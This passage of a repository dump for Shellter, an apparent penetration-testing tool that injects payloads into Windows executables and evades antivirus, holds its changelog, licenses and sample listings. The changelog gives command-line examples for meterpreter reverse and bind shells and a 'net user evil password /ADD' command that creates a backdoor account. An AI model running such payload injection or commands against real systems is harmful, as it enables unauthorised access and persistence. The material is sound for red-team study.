from Shellter. In that case the 661 | payload would be encoded, but without using the encoding scheme that was 662 | defined by the user. 663 | 664 | [+] Decreased the maximum of extra delay that is applied before the execution 665 | of the payload, when Stealth mode is not enabled. 666 | 667 | [+] Several internal optimizations. 668 | 669 | 670 | 671 | 672 | Shellter V [5.7] 673 | .................. 674 | 675 | Released 14d/11m/2015 676 | 677 | [+] Enhanced thread-context-aware polymorphic code engine. 678 | More instructions supported with even more randomized 679 | output. 680 | 681 | [+] Optimized CTRL event listener. 682 | In tracing mode, the user can still interrupt that stage and proceed with 683 | the rest of the injection process by pressing CTRL+C, but after this stage 684 | Shellter disables processing CTRL+C as a signal in order to protect itself 685 | from being accidentally terminated during the injection stages. In case 686 | an error occurs, or at successful completion of injection, processing of 687 | CTRL+C is re-enabled. 688 | 689 | [+] Automatic deletion of the dropped Disasm.dll module even when Shellter is 690 | terminated by closing the console window. If multiple instances of Shellter 691 | are running, then the aforementioned module will be deleted once the last 692 | instance of Shellter is terminated. 693 | Note: This doesn't apply in case Shellter is terminated by another process, 694 | such as the task manager. 695 | 696 | [+] Added a user reminder at the PE file backup stage. 697 | Always remember that the .bak file is the previous state of what you are 698 | going to generate. 699 | In other words, the first time you infect a PE file, the .bak file is the 700 | clean PE file. If you decide to add another payload to that PE file, then 701 | the new .bak file is the PE file already infected with one payload. 702 | 703 | [+] Updated section 8 of the current documentation (readme.txt) file. 704 | 705 | [+] Various internal updates and optimizations. 706 | 707 | 708 | 709 | 710 | Shellter V [5.8] 711 | .................. 712 | 713 | Released 22d/11m/2015 714 | 715 | [+] Command line parser modifications. 716 | A few changes have been made in the command line parser to ensure that 717 | certain arguments are passed in a specific order. This modification will 718 | later serve one of the new features of the upcoming advanced edition of 719 | Shellter. 720 | In particular, when specifying one of the embedded payloads, then the 721 | options for that payload (--lhost, --port, --cmd) must now follow 722 | immediately after. 723 | 724 | Examples: -p meterpreter_reverse_tcp --lhost 192.168.0.9 --port 3465 725 | -p meterpreter_bind_tcp --port 4565 726 | -p winexec --cmd "cmd.exe /c net user evil password /ADD" 727 | 728 | [+] Shellter will now exit automatically when command line arguments have been 729 | used, in order to facilitate it's usage through scripting. 730 | 731 | [+] When '-h/--help' and '--examples' command line arguments are used, Shellter 732 | will now print all the output at once, so that the user can easily save it 733 | into a file and read it from there. 734 | 735 | [+] List of usage examples has been updated. 736 | Run Shellter using --examples argument to display them. 737 | 738 | [+] Minor updates/corrections in the documentation and in the help menu. 739 | Run Shellter using -h/--help arguments to display the list of supported 740 | arguments with further explanation. 741 | 742 | [+] Various internal updates and optimizations. 743 | 744 | 745 | 746 | 747 | Shellter V [5.9] 748 | .................. 749 | 750 | Released 20d/12m/2015 751 | 752 | [+] Enhanced thread-context-aware polymorphic code engine. 753 | More instructions are now supported, to produce an even more randomized 754 | output. 755 | 756 | [+] Various internal updates and optimizations. 757 | 758 | 759 | 760 | 761 | Shellter VI [6.0] 762 | ................... 763 | 764 | Released 23d/01m/2016 765 | 766 | [+] Extra IAT handler for encoded payloads and Stealth mode support. 767 | Shellter can now also use a 'GetModuleHandle/GetProcAddress' combination, 768 | and brings the total number of available IAT handlers to eight. 769 | This increases Stealth mode compatibility with even more PE files. 770 | 771 | [+] Optional 'Online version check' feature. 772 | When using Manual mode, or Auto mode without command line arguments, 773 | Shellter will ask for the user's authorization to perform this check. 774 | When command line arguments are used, this feature is disabled by default, 775 | but it can be enabled by adding the '--VersionCheck' switch along with the 776 | rest of the arguments. This feature is not available from Wine mode. 777 | 778 | [+] Extra validation check in the third stage filtering that picks the 779 | available injection locations for DTCK usage. 780 | 781 | [+] Extra validation check for virtual address ranges selection used by several 782 | functions of the engine that generates polymorphic code for obfuscation 783 | purposes. 784 | 785 | [+] Before accessing a target file, Shellter will attempt to change its 786 | attributes to FILE_ATTRIBUTE_NORMAL. 787 | Some files might have some extra attributes enabled, such as 'READ_ONLY' 788 | which are preserved when we copy a file from one directory to another. 789 | By enabling Shellter to change these attributes, we ensure that the user 790 | doesn't have to be aware of this issue, thus eliminating usage problems. 791 | 792 | [+] Various internal updates and optimizations. 793 | 794 | 795 | 796 | 797 | Shellter VI [6.1] 798 | ................... 799 | 800 | Released 20d/02m/2016 801 | 802 | [+] Minor documentation updates. 803 | 804 | [+] Minor updates and optimizations. 805 | 806 | 807 | 808 | 809 | Shellter VI [6.2] 810 | ................... 811 | 812 | Released 27d/03m/2016 813 | 814 | [+] Optimizations in thread-context-aware polymorphic code engine. 815 | 816 | [+] Minor speed optimizations in the tracing engine. 817 | 818 | [+] If Shellter finds a dropped DisASM.dll that is not being used by another 819 | instance of Shellter, then it will replace it and load the new copy. 820 | 821 | [+] Enhanced backup functionality. 822 | Shellter will now create a 'Shellter_Backups' directory and will move there 823 | the original PE files. If the user intentionally re-infects the same PE 824 | file, Shellter will not overwrite anymore the original backup, but it will 825 | notify the user about the fact that the current PE file in use might be 826 | infected already. 827 | 828 | [+] Shellter will now enable the SE_DEBUG_NAME privilege when running as 829 | Administrator. 830 | This solves some situations where Shellter cannot detach from the child 831 | process to complete the payload injection if the latter modifies the ACEs 832 | in its own ACL with more restrictive permissions. 833 | 834 | [+] Added extra system-defined error message formatting. 835 | Shellter will display an additional human readable explanation defined by 836 | Windows OS, based on the error code number. This can assist the user to 837 | troubleshoot some issues that are not actually bugs in Shellter. 838 | 839 | [+] Addressed some extra SDL checks. 840 | 841 | [+] Various internal updates and optimizations. 842 | 843 | 844 | 845 | 846 | Shellter VI [6.3] 847 | ................... 848 | 849 | Released 20d/04m/2016 850 | 851 | [+] Fixed a bug in the validation of the user-supplied encoding sequence in 852 | Manual Mode. 853 | 854 | [+] Several optimizations in the tracing engine. 855 | 856 | [+] Minor updates and optimizations. 857 | 858 | 859 | 860 | 861 | Shellter VI [6.4] 862 | ................... 863 | 864 | Released 30d/04m/2016 865 | 866 | [+] Fixed a bug in the 'Time Travel' feature. 867 | In case Shellter doesn't find an appropriate location, based on the traced 868 | execution flow, to inject the generated code along with the payload, then 869 | it restores a previous state. This allows the user to re-configure what to 870 | inject. However, due to an error in sanitizing some variables, the new 871 | injection attempt would fail anyway. 872 | 873 | [+] Fixed a bug that caused a "RMEM_ERROR_01" type error when using Shellter 874 | in Wine. 875 | This bug was introduced in the previous update by not correctly updating 876 | a variable after applying some updates in the code. 877 | 878 | [+] Fixed an update regarding enabling the SE_DEBUG_NAME privilege to solve 879 | some rare cases where the traced application might further restrict the 880 | access to its own object. 881 | 882 | [+] Multiple optimizations in the tracing engine. 883 | 884 | [+] Other minor updates. 885 | 886 | 887 | 888 | 889 | Shellter VI [6.5] 890 | ................... 891 | 892 | Released 14d/05m/2016 893 | 894 | [+] Fixed a logic error in the IAT Handlers feature. 895 | Under certain conditions, Shellter might have used the unicode version of 896 | GetModuleHandle function with an IAT Handler stub dedicated for the Ascii 897 | input version version of it. 898 | 899 | [+] Fixed a typo issue in the command line parser that wouldn't allow to set 900 | the embedded bind_shell_tcp stager as payload from the command line. 901 | 902 | [+] Fixed a logic error in the command line parser that was triggered when 903 | specifying first '--stealth/-s' and then '--handler iat/section' arguments. 904 | When stealth mode is enabled, the iat type handler is automatically set, so 905 | there is no need to be specified by the user. In this case the parser would 906 | enter the execution path to check the handler type specified, but since 907 | that was already set it would be treated as new argument which is invalid 908 | by itself. 909 | 910 | [+] Added "[stager]" indicator next to the name of the appropriate embedded 911 | payloads. 912 | 913 | [+] Other minor updates and optimizations. 914 | 915 | 916 | 917 | 918 | Shellter VI [6.6] 919 | ................... 920 | 921 | Released 14d/09m/2016 922 | 923 | [+] Fixed a command line parsing bug that wouldn't allow to use reflective DLLs 924 | as payloads when using auto mode in conjuction with command line arguments. 925 | 926 | [+] Added a note about '--lhost' parameter in the help menu. 927 | 928 | [+] Other minor updates. 929 | 930 | 931 | 932 | 933 | Shellter VI [6.7] 934 | ................... 935 | 936 | Released 05d/10m/2016 937 | 938 | [+] Minor updates related to size checks of custom payload and polymorphic code 939 | files submitted by the user. 940 | 941 | [+] Fixed a file handle leak in the function that validates the file size of 942 | the custom payload file. 943 | 944 | [+] Minor documentation updates. 945 | 946 | [+] Other minor updates. 947 | 948 | 949 | 950 | 951 | Shellter VI [6.8] 952 | ................... 953 | 954 | Released 01d/11m/2016 955 | 956 | [+] Fixed a bug related to processing custom payload filenames 957 | in Manual Mode. Auto Mode was not affected. 958 | The buffer storing the filename was not re-initialized in case 959 | the first attempt to define the filename failed. 960 | 961 | Reported by: @fancy__04 962 | 963 | [+] Command line parser updates regarding the --Reflective 964 | parameter/argument. 965 | The parser will now make a couple of extra checks to make sure that 966 | it has been used correctly. 967 | 968 | [+] Fixed a potential file handle leak in the function that reads a 969 | custom payload from a file. 970 | We now close the handle before exiting this function. 971 | This handle was previously closed later on, once the payload injection 972 | was completed. 973 | 974 | [+] Other minor updates. 975 | 976 | 977 | 978 | 979 | Shellter VI [6.9] 980 | ................... 981 | 982 | Released 27d/02m/2017 983 | 984 | [+] Fixed a NULL pointer dereference bug in the function that parses the 985 | exports table of reflective DLLs used as payloads and calculates the 986 | offset of the reflective loader function. 987 | This would normally trigger if the user submitted a packed DLL with 988 | the exports table preserved. 989 | In that case the exported function would be located but further information 990 | extraction would fail due to the packed state of the PE file. 991 | Shellter will now handle this and report an error message. However, it is 992 | not recommended to submit packed PE files. 993 | 994 | Reported by: Max Alex 995 | 996 | [+] Added some extra proprietary error codes to assist troubleshooting in case 997 | a related bug is reported. 998 | 999 | [+] Added some extra checks in the command line parser for '--polyIAT' and 1000 | '--polyDecoder' arguments. 1001 | Shellter will now verify that '--handler IAT' and/or '--encode' arguments 1002 | have been set before using any of the aforementioned obfuscation enabling 1003 | arguments. 1004 | 1005 | [+] Minor updates in the function the adjusts the embedded payloads. 1006 | 1007 | [+] Other minor updates. 1008 | 1009 | [+] The displayed in-app logo was changed with a more minimalistic one which 1010 | fits a lot better the console view of the application. 1011 | 1012 | 1013 | 1014 | 1015 | Shellter v7.0 1016 | ................... 1017 | 1018 | Released 18d/07m/2017 1019 | 1020 | [+] Maintenance release that includes bug fixes and minor improvements that 1021 | were addressed during the development of Shellter Pro between versions 1022 | 1.0 to 2.2. 1023 | 1024 | 1025 | 1026 | 1027 | Shellter v7.1 1028 | ............... 1029 | 1030 | Released 01d/12m/2017 1031 | 1032 | [+] Fixed a bug in the last stage of Stealth Mode. 1033 | This was due to rarely manifested issue that would cause an 1034 | ERROR_INVALID_USER_BUFFER Windows error (code: 1784). 1035 | 1036 | [+] Fixed a tracer issue in Windows 10. 1037 | Noticed that in Windows 10 Shellter would detect a few spawned system 1038 | threads during process initialization. However, because this happens before 1039 | the actual tracing starts if the user disables tracing of all threads via 1040 | Manual Mode, or the target is a DLL, and/or DTCK is enabled, then the 1041 | tracing stage stops before even starting. 1042 | This happens because in those cases Shellter will stop tracing once an 1043 | additional thread is created. Since those system threads are irrelevant 1044 | with Shellter's technical details, the tracer was updated to ignore those 1045 | system threads on process initialization. 1046 | 1047 | [+] Fixed Windows error codes translation to error messages in Windows 10. 1048 | 1049 | [+] Fixed console and font size adjustment in Windows 10. 1050 | 1051 | [+] Other minor adjustments. 1052 | 1053 | 1054 | 1055 | 1056 | Shellter v7.2 1057 | ............... 1058 | 1059 | Released 22d/02m/2020 1060 | 1061 | [+] Added an extra detection method for Wine environment. 1062 | A recent update in Wine broke the original detection method which is 1063 | necessary in order for Shellter to operate in 'Wine Mode'. 1064 | The original detection method still applies in order to maintain 1065 | compatibility with previous Wine versions. 1066 | 1067 | [+] Minor update in the tracer. 1068 | 1069 | 1070 | 1071 | 1072 | 1073 | 1074 | 1075 | 1076 | -------------------------------------------------------------------------------- /licenses/BeaEngine.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/licenses/BeaEngine.png -------------------------------------------------------------------------------- /licenses/BeaEngine_License.txt: -------------------------------------------------------------------------------- 1 | http://beatrix2004.free.fr/BeaEngine/licence1.php 2 | 3 | This library is released under LGPL license. That means you can use it in your 4 | projects even if they are under free or proprietary licenses. You don't have 5 | to modify your license (if there is one) and you don't have to publish your 6 | source code. But, if you improve BeaEngine, you have to publish the modified 7 | library under one of the following license : LGPL or GPL. 8 | 9 | Here are the terms of that license : 10 | 11 | Copyright (c) 2009 , BeatriX 12 | 13 | GNU LESSER GENERAL PUBLIC LICENSE 14 | Version 3, 29 June 2007 15 | 16 | Copyright (C) 2007 Free Software Foundation, Inc. 17 | Everyone is permitted to copy and distribute verbatim copies 18 | of this license document, but changing it is not allowed. 19 | 20 | 21 | This version of the GNU Lesser General Public License incorporates 22 | the terms and conditions of version 3 of the GNU General Public 23 | License, supplemented by the additional permissions listed below. 24 | 25 | 0. Additional Definitions. 26 | 27 | As used herein, "this License" refers to version 3 of the GNU Lesser 28 | General Public License, and the "GNU GPL" refers to version 3 of the GNU 29 | General Public License. 30 | 31 | "The Library" refers to a covered work governed by this License, 32 | other than an Application or a Combined Work as defined below. 33 | 34 | An "Application" is any work that makes use of an interface provided 35 | by the Library, but which is not otherwise based on the Library. 36 | Defining a subclass of a class defined by the Library is deemed a mode 37 | of using an interface provided by the Library. 38 | 39 | A "Combined Work" is a work produced by combining or linking an 40 | Application with the Library. The particular version of the Library 41 | with which the Combined Work was made is also called the "Linked 42 | Version". 43 | 44 | The "Minimal Corresponding Source" for a Combined Work means the 45 | Corresponding Source for the Combined Work, excluding any source code 46 | for portions of the Combined Work that, considered in isolation, are 47 | based on the Application, and not on the Linked Version. 48 | 49 | The "Corresponding Application Code" for a Combined Work means the 50 | object code and/or source code for the Application, including any data 51 | and utility programs needed for reproducing the Combined Work from the 52 | Application, but excluding the System Libraries of the Combined Work. 53 | 54 | 1. Exception to Section 3 of the GNU GPL. 55 | 56 | You may convey a covered work under sections 3 and 4 of this License 57 | without being bound by section 3 of the GNU GPL. 58 | 59 | 2. Conveying Modified Versions. 60 | 61 | If you modify a copy of the Library, and, in your modifications, a 62 | facility refers to a function or data to be supplied by an Application 63 | that uses the facility (other than as an argument passed when the 64 | facility is invoked), then you may convey a copy of the modified 65 | version: 66 | 67 | a) under this License, provided that you make a good faith effort to 68 | ensure that, in the event an Application does not supply the 69 | function or data, the facility still operates, and performs 70 | whatever part of its purpose remains meaningful, or 71 | 72 | b) under the GNU GPL, with none of the additional permissions of 73 | this License applicable to that copy. 74 | 75 | 3. Object Code Incorporating Material from Library Header Files. 76 | 77 | The object code form of an Application may incorporate material from 78 | a header file that is part of the Library. You may convey such object 79 | code under terms of your choice, provided that, if the incorporated 80 | material is not limited to numerical parameters, data structure 81 | layouts and accessors, or small macros, inline functions and templates 82 | (ten or fewer lines in length), you do both of the following: 83 | 84 | a) Give prominent notice with each copy of the object code that the 85 | Library is used in it and that the Library and its use are 86 | covered by this License. 87 | 88 | b) Accompany the object code with a copy of the GNU GPL and this license 89 | document. 90 | 91 | 4. Combined Works. 92 | 93 | You may convey a Combined Work under terms of your choice that, 94 | taken together, effectively do not restrict modification of the 95 | portions of the Library contained in the Combined Work and reverse 96 | engineering for debugging such modifications, if you also do each of 97 | the following: 98 | 99 | a) Give prominent notice with each copy of the Combined Work that 100 | the Library is used in it and that the Library and its use are 101 | covered by this License. 102 | 103 | b) Accompany the Combined Work with a copy of the GNU GPL and this license 104 | document. 105 | 106 | c) For a Combined Work that displays copyright notices during 107 | execution, include the copyright notice for the Library among 108 | these notices, as well as a reference directing the user to the 109 | copies of the GNU GPL and this license document. 110 | 111 | d) Do one of the following: 112 | 113 | 0) Convey the Minimal Corresponding Source under the terms of this 114 | License, and the Corresponding Application Code in a form 115 | suitable for, and under terms that permit, the user to 116 | recombine or relink the Application with a modified version of 117 | the Linked Version to produce a modified Combined Work, in the 118 | manner specified by section 6 of the GNU GPL for conveying 119 | Corresponding Source. 120 | 121 | 1) Use a suitable shared library mechanism for linking with the 122 | Library. A suitable mechanism is one that (a) uses at run time 123 | a copy of the Library already present on the user's computer 124 | system, and (b) will operate properly with a modified version 125 | of the Library that is interface-compatible with the Linked 126 | Version. 127 | 128 | e) Provide Installation Information, but only if you would otherwise 129 | be required to provide such information under section 6 of the 130 | GNU GPL, and only to the extent that such information is 131 | necessary to install and execute a modified version of the 132 | Combined Work produced by recombining or relinking the 133 | Application with a modified version of the Linked Version. (If 134 | you use option 4d0, the Installation Information must accompany 135 | the Minimal Corresponding Source and Corresponding Application 136 | Code. If you use option 4d1, you must provide the Installation 137 | Information in the manner specified by section 6 of the GNU GPL 138 | for conveying Corresponding Source.) 139 | 140 | 5. Combined Libraries. 141 | 142 | You may place library facilities that are a work based on the 143 | Library side by side in a single library together with other library 144 | facilities that are not Applications and are not covered by this 145 | License, and convey such a combined library under terms of your 146 | choice, if you do both of the following: 147 | 148 | a) Accompany the combined library with a copy of the same work based 149 | on the Library, uncombined with any other library facilities, 150 | conveyed under the terms of this License. 151 | 152 | b) Give prominent notice with the combined library that part of it 153 | is a work based on the Library, and explaining where to find the 154 | accompanying uncombined form of the same work. 155 | 156 | 6. Revised Versions of the GNU Lesser General Public License. 157 | 158 | The Free Software Foundation may publish revised and/or new versions 159 | of the GNU Lesser General Public License from time to time. Such new 160 | versions will be similar in spirit to the present version, but may 161 | differ in detail to address new problems or concerns. 162 | 163 | Each version is given a distinguishing version number. If the 164 | Library as you received it specifies that a certain numbered version 165 | of the GNU Lesser General Public License "or any later version" 166 | applies to it, you have the option of following the terms and 167 | conditions either of that published version or of any later version 168 | published by the Free Software Foundation. If the Library as you 169 | received it does not specify a version number of the GNU Lesser 170 | General Public License, you may choose any version of the GNU Lesser 171 | General Public License ever published by the Free Software Foundation. 172 | 173 | If the Library as you received it specifies that a proxy can decide 174 | whether future versions of the GNU Lesser General Public License shall 175 | apply, that proxy's public statement of acceptance of any version is 176 | permanent authorization for you to choose that version for the 177 | Library. 178 | -------------------------------------------------------------------------------- /licenses/Shellter_License.txt: -------------------------------------------------------------------------------- 1 | License Agreement 2 | ==================== 3 | 4 | This software makes use of the "BeaEngine Disassembler" library. 5 | 6 | This license was updated the 26th of February 2017. 7 | 8 | 9 | Disclaimer 10 | ----------- 11 | This software is created with the sole purpose to assist ethical hackers in their daily jobs during 12 | Penetration Testing and/or Red Team engagements. The author of this software and Insainted Ltd 13 | assume no responsibility for any unlawful actions taken and any damages caused by using this software. 14 | 15 | 16 | Terms of Use 17 | ============== 18 | 19 | 1) You can use this software and share it with anyone as long as you do this 20 | for free and you respect all the following terms. 21 | 22 | 2) You assume full responsibility for any damage caused by this software either 23 | this applies to you or to someone else. 24 | 25 | 3) You assume full responsibility for any unlawful actions taken by using this 26 | software. 27 | 28 | 4) You are allowed to modify this software, but if you do then you have to 29 | explicitly state so in case you share it with other people. 30 | 31 | 5) You are allowed to reverse engineer it, disassemble it, debug it, for any 32 | reason that might be, but in case you find a bug then please report it to 33 | the author and give him the necessary amount of time to fix it before 34 | disclosing it. 35 | 36 | 6) You are allowed to distribute this software from your own website, but if 37 | you do then you have to include a link to the official website along with 38 | a link to this license agreement. 39 | 40 | 7) You are allowed to use this software for work purposes, but you are not 41 | allowed to charge for it. 42 | 43 | This means that you have the right to use it as a complementary tool to 44 | assist you at work for business purposes, but you are not allowed to to use 45 | it in situations that fall in the following two cases (a and b) without the 46 | written agreement of its author. 47 | 48 | a. You are not allowed to build a commercial service based on this software. 49 | b. You are not allowed to integrate this software with any other software, 50 | unless it's for private usage and does not violate the previous term. 51 | 52 | 8) You are not allowed to use this software to gain unauthorized access to a 53 | computer system or network without a written agreement of its owner. 54 | 55 | 9) You are not allowed to build any type of public software such as 'tools', 56 | 'scripts', 'applications', and 'frameworks', that are using and/or 57 | referencing this software without the written agreement of its author. 58 | 59 | 60 | Thank you, 61 | kyREcon -------------------------------------------------------------------------------- /shellcode_samples/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellcode_samples/calc -------------------------------------------------------------------------------- /shellcode_samples/calcenc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellcode_samples/calcenc -------------------------------------------------------------------------------- /shellcode_samples/info.txt: -------------------------------------------------------------------------------- 1 | These are set to kill the process after execution, so don't use them to evaluate Stealth Mode. 2 | 3 | 4 | calc: Launch Calc.exe - No Encoding 5 | 6 | calcenc : Launch Calc.exe - Custom Encoding 7 | 8 | krb1: Launch Calc.exe - Metasploit Single Encoding 9 | 10 | krb3 : Launch Calc.exe - Metasploit Triple Encoding -------------------------------------------------------------------------------- /shellcode_samples/krb1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellcode_samples/krb1 -------------------------------------------------------------------------------- /shellcode_samples/krb3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellcode_samples/krb3 -------------------------------------------------------------------------------- /shellter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellter.exe --------------------------------------------------------------------------------